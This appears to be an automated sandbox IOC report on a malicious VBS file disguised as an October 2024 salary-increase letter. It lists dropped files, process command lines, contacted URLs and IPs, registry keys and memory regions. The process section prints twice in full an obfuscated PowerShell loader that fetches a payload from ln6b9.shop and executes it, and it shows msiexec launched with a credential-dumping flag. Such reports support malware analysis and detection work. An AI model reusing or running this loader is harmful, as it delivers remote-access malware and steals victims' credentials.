IOC Report
Salary Increase Letter_Oct 2024.vbs

loading gif

Files

File Path
Type
Category
Malicious
Salary Increase Letter_Oct 2024.vbs
ASCII text, with very long lines (1625), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1ours4x.ine.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2yeomto.dht.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyddfzdl.pnc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_metcihpi.1r0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Foregrib.ses
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 25 hidden processes, click here to show them.

URLs

Name
IP
Malicious
154.216.17.14
malicious
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://crl.microB
unknown
https://contoso.com/License
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32
172.67.128.117
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin#
unknown
https://aka.ms/pscore6lB
unknown
http://ln6b9.shop
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://crl.microsoftmB4
unknown
http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32XR
unknown
https://aka.ms/pscore68
unknown
http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin
172.67.128.117
http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.binq
unknown
http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32P
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
http://www.ebuddy.com
unknown
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.210.172
geoplugin.net
178.237.33.50
ln6b9.shop
172.67.128.117

IPs

IP
Domain
Country
Malicious
154.216.17.14
unknown
Seychelles
malicious
178.237.33.50
geoplugin.net
Netherlands
172.67.128.117
ln6b9.shop
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
time
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
99F9000
heap
page read and write
malicious
8BD7000
direct allocation
page execute and read and write
malicious
1B5E4687000
trusted library allocation
page read and write
malicious
9A0D000
heap
page read and write
malicious
5943000
trusted library allocation
page read and write
malicious
9A23000
heap
page read and write
malicious
83F0000
direct allocation
page execute and read and write
malicious
1B5ECAC2000
heap
page read and write
7FF7C00A0000
trusted library allocation
page read and write
1C353AB1000
heap
page read and write
1C3522F0000
heap
page read and write
83AE000
stack
page read and write
7FF7BFEDA000
trusted library allocation
page read and write
5DB678B000
stack
page read and write
2880000
trusted library allocation
page read and write
1C353BE0000
remote allocation
page read and write
1C353ABA000
heap
page read and write
1C353FCF000
heap
page read and write
1C352078000
heap
page read and write
251CE000
stack
page read and write
25900000
heap
page read and write
593D000
trusted library allocation
page read and write
1C353F51000
heap
page read and write
7FF7BFDD0000
trusted library allocation
page read and write
1B5D2A30000
heap
page read and write
9A46000
heap
page read and write
29B0000
trusted library allocation
page execute and read and write
6E3F000
stack
page read and write
5791000
trusted library allocation
page read and write
1B5D4500000
heap
page execute and read and write
1B5ECA60000
heap
page read and write
7FF7C0080000
trusted library allocation
page read and write
2E70000
heap
page read and write
1C35205E000
heap
page read and write
1C353FB9000
heap
page read and write
D1D7000
direct allocation
page execute and read and write
1C354081000
heap
page read and write
7DD0000
heap
page read and write
2E7B000
heap
page read and write
1C351F70000
heap
page read and write
7FF7BFFC0000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
99C0000
heap
page read and write
6D7E000
stack
page read and write
2B8D000
stack
page read and write
9A4D000
heap
page read and write
5DB5A3F000
stack
page read and write
7E70000
trusted library allocation
page read and write
9FD7000
direct allocation
page execute and read and write
7FF7BFF10000
trusted library allocation
page execute and read and write
1B5ECABC000
heap
page read and write
1C35205A000
heap
page read and write
7036EFB000
stack
page read and write
5DB54FE000
stack
page read and write
1C353AB9000
heap
page read and write
B420000
unclassified section
page execute and read and write
8400000
trusted library allocation
page read and write
6927000
remote allocation
page execute and read and write
1B5D4470000
trusted library allocation
page read and write
1C351FEF000
heap
page read and write
1C353FE1000
heap
page read and write
9A3E000
heap
page read and write
81B6000
heap
page read and write
72F0000
trusted library allocation
page read and write
7FF7C0090000
trusted library allocation
page read and write
28B0000
heap
page readonly
1B5D2A9A000
heap
page read and write
1B5D4490000
trusted library allocation
page read and write
1C353FCF000
heap
page read and write
2885000
trusted library allocation
page execute and read and write
1C354122000
heap
page read and write
1C353F72000
heap
page read and write
6E40000
heap
page read and write
7FF7C0030000
trusted library allocation
page read and write
5DB670B000
stack
page read and write
24C10000
direct allocation
page read and write
73BB000
stack
page read and write
7B0000
trusted library section
page read and write
252FB000
stack
page read and write
1C352045000
heap
page read and write
1B5ECF40000
heap
page read and write
5DB59BC000
stack
page read and write
5DB55FC000
stack
page read and write
1C352180000
heap
page read and write
8340000
trusted library allocation
page read and write
1C35400F000
heap
page read and write
257CB000
heap
page read and write
7036AFE000
stack
page read and write
1C35406C000
heap
page read and write
466E000
stack
page read and write
8360000
trusted library allocation
page read and write
6E70000
heap
page read and write
1C354055000
heap
page read and write
9A4D000
heap
page read and write
1C3520A2000
heap
page read and write
2850000
trusted library allocation
page read and write
1B5ECD63000
heap
page read and write
7060000
heap
page execute and read and write
1B5E4901000
trusted library allocation
page read and write
1B5D4611000
trusted library allocation
page read and write
7FF7BFF02000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
7FF7BFD3B000
trusted library allocation
page read and write
1C352094000
heap
page read and write
2E8F000
heap
page read and write
7FF7BFFD0000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
1B5ECD45000
heap
page read and write
1B5D5C54000
trusted library allocation
page read and write
24C90000
direct allocation
page read and write
1C353FB9000
heap
page read and write
7DB0000
heap
page read and write
6DBF000
stack
page read and write
1C3520A2000
heap
page read and write
1B5D2AD4000
heap
page read and write
8130000
heap
page read and write
2BCF000
stack
page read and write
7036DFF000
stack
page read and write
9A80000
heap
page read and write
1C353FE1000
heap
page read and write
287A000
trusted library allocation
page execute and read and write
1C354075000
heap
page read and write
9127000
remote allocation
page execute and read and write
9AE0000
heap
page read and write
811C000
stack
page read and write
1C353F92000
heap
page read and write
1C353F6D000
heap
page read and write
29AC000
stack
page read and write
7070000
trusted library allocation
page read and write
1C353F87000
heap
page read and write
1C352086000
heap
page read and write
1C353FE1000
heap
page read and write
7E5E000
stack
page read and write
6B50000
direct allocation
page read and write
2527F000
stack
page read and write
1C354120000
heap
page read and write
7FF7C0060000
trusted library allocation
page read and write
7FE5000
trusted library allocation
page read and write
4060000
remote allocation
page execute and read and write
7E9B000
trusted library allocation
page read and write
8156000
heap
page read and write
6F93000
heap
page read and write
1C352072000
heap
page read and write
9A4F000
heap
page read and write
1B5D4605000
heap
page read and write
7FF7BFFE0000
trusted library allocation
page read and write
1B5EC61C000
heap
page read and write
72E0000
trusted library allocation
page read and write
285D000
trusted library allocation
page execute and read and write
1B5ECAB0000
heap
page read and write
1B5D2C95000
heap
page read and write
1C353F72000
heap
